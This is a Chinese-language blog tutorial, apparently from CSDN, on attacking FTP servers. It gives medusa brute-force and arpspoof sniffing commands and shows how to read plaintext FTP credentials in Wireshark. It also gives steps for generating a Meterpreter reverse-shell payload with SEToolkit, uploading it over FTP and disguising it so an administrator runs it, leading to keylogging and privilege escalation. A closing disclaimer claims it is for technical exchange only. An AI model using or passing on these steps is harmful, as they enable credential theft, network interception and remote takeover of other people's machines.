一、 FTP用户名密码暴力破解
1、知道用户名和密码nc直接相连
2、知道用户名不知道密码
medusa工具
medusa -d 可以查看可以破解模块都有什么
medusa -h IP地址 -u 用户名 -P 字典 ftp
二、FTP用户名明文密码验证
1、FTP协议中用户认证的过程,客户端和用户端都是采用的明文进行交互信息。验证FTP登录过程中明文传输用户名和密码。
2、用wireshark抓包验证明文传输。
先输入ftp,点击eth0,nc IP地址,USER/PASS登录,接着在wireshark中的数据包中可以看见明文状态下的用户名和密码
三、嗅探FTP用户名明文密码
1、利用arpspoof进行ARP嗅探
arpspoof -i eth0 网关 -t 目标IP
arpspoot -i eth0 192.168.1.1 -t 192.168.1.107
2、wireshark抓包查看用户名和密码
四、FTP登录后可以做什么
1、利用metasploit创建反弹shell上传到FTP服务器。可以利用setookit快速生成反弹shell。
2、步骤(kali中):
1)、setookit
2)、选择Create a Payload and Listener
3)、选择Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
4)、(LHOST):kali的地址/监听者的地址
5)、(PORT):输入你要的设定的端口号。(可以重开终端输入netstat -pantu查看现在使用的端口,避免冲突),在输入回车键以后,会生成payload文件,耐心等待。完成后,会提示是否开启payload监听,根据情况输入。
6)、重开一个终端,进入/root/.set/文件夹中,查看是否有payload.exe文件
7)、上传payload.exe文件到ftp服务器。(把payload.exe文件放在实体机桌面,在cmd中进行进入ftp使用命令 ,ftp 目标FTP的IP地址,然后登录,使用put payload.exe文件绝对地址 )
8)、会在根目录下出现payload.exe文件
9)、诱惑管理员点击(重命名/改图标等等)
10)、如果管理员点击,在kali中打开metasploit 然后输入sessions -l,sessions -i 序号
11)、可以键盘记录、关机、获取更高的权限,shell等等。
以上内容仅作为技术交流,不能做非法用途。珍爱生命
————————————————
版权声明:本文为CSDN博主「lao_wine」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/MysteriousMadness/article/details/108250774